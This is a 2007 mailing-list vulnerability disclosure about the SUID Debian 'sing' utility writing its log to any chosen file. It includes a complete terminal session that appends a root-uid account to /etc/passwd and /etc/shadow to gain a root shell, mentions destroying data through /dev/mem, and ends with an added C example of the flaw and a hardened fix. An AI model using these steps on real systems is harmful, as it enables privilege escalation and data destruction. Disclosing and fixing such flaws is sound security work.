Subject: sing (debian) vulnerability?
From: Milen Rangelov <mrangelov@globul.bg.>
To: [email protected]
Content-Type: text/plain
Date: Mon, 03 Dec 2007 08:32:26 +0000
Message-Id: <1196670746.5175.15.camel@gat3way.globul.bg.>
Mime-Version: 1.0
X-Mailer: Evolution 2.6.3
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 03 Dec 2007 08:32:28.0798 (UTC) FILETIME=[0A3239E0:01C83587]
X-Virus-Scanned: antivirus-gw at tyumen.ru
Hello,
The sing utility (Send Nasty ICMP Garbage) is a ping replacement that
allows sending ICMP packets with spoofed source and custom ICMP
types/codes (http://sourceforge.net/projects/sing).
The Debian package provides sing as a suid binary (actually, the sid
distribution asks the user whether he'd like it installed suid, I'm not
100% sure, but in etch it installs it suid anyway; should check).
The sing program has the "-L" option to log its output to a log file.
Because it does not check the ownership of that file, any file could be
overwritten (more precisely, appended to) with its log output.
I tried to play with making the output usable for some privilege
escalation purposes, but failed initially (sing escapes some bad input,
ehm).
However, it's still possible for any user to crash the system or destroy
block devices' data (provided that the binary is installed SUID, of
course). Exploiting that is trivial: just give /dev/mem or any block
device as the log file.
However, later on I decided to try again to gain root privileges,
and it turned out to be quite trivial.
Here is an example session:
gat3way@gat3way:~$ cat hah
hack:x:0:0:/tmp:/bin/sh
n
gat3way@gat3way:~$ cat hah1
hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::
n
gat3way@gat3way:~$ grep hack /etc/passwd
gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`"
SINGing to localhost (127.0.0.1): 78 data bytes
78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms
--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.073/0.073/0.073 ms
gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`"
SINGing to localhost (127.0.0.1): 43 data bytes
43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms
--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.083/0.083/0.083 ms
gat3way@gat3way:~$ grep hack /etc/passwd
hack:x:0:0:/tmp:/bin/sh
gat3way@gat3way:~$ ssh hack@localhost
hack@localhost's password:
..
root@gat3way:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gat3way:~#
After all, that's not a huge problem, because quite a few users install
sing AFAIK. But it's a very easily exploited vulnerability OTOH, and it
leads to superuser privilege escalation, a system crash, or destroyed
data.
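For readers maintaining similar SUID tools, the following is an added illustration (not sing's code and not part of this report) of the root cause described above and the usual fix: the log file named by -L must be opened with the invoker's real uid, not the effective root uid, so the kernel applies the invoker's own permissions; as defence in depth it also refuses device nodes and symlinks. The function names and the 0644 mode are assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern, as the report describes it: the SUID-root binary
 * opens whatever path the invoker passed to -L using its effective uid
 * (root), so the invoker's own permissions are never applied. */
int open_log_vulnerable(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
}

/* Hardened: open the log as the *real* uid, then restore the effective
 * uid for the raw-socket work that actually needs root.  Additionally
 * refuse anything that is not a regular file (e.g. /dev/mem) and do not
 * follow a symlink at the final path component.  (Hypothetical helper.) */
int open_log_hardened(const char *path)
{
    uid_t saved_euid = geteuid();
    struct stat st;
    int fd, saved_errno;

    if (seteuid(getuid()) != 0)          /* drop to the invoker's uid */
        return -1;
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0644);
    saved_errno = errno;
    if (seteuid(saved_euid) != 0) {      /* cannot regain privileges: bail */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd < 0) {
        errno = saved_errno;
        return -1;
    }
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);                       /* device node, FIFO, etc. */
        errno = EINVAL;
        return -1;
    }
    return fd;
}
```

Running as an unprivileged user, open_log_hardened("/dev/null") fails while open_log_vulnerable accepts it, which is exactly the /dev/mem case the report mentions.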
Regards,
Milen Rangelov
P.S. Sorry if this mail is duplicated; I had some problems with my mail
server and had to resend it.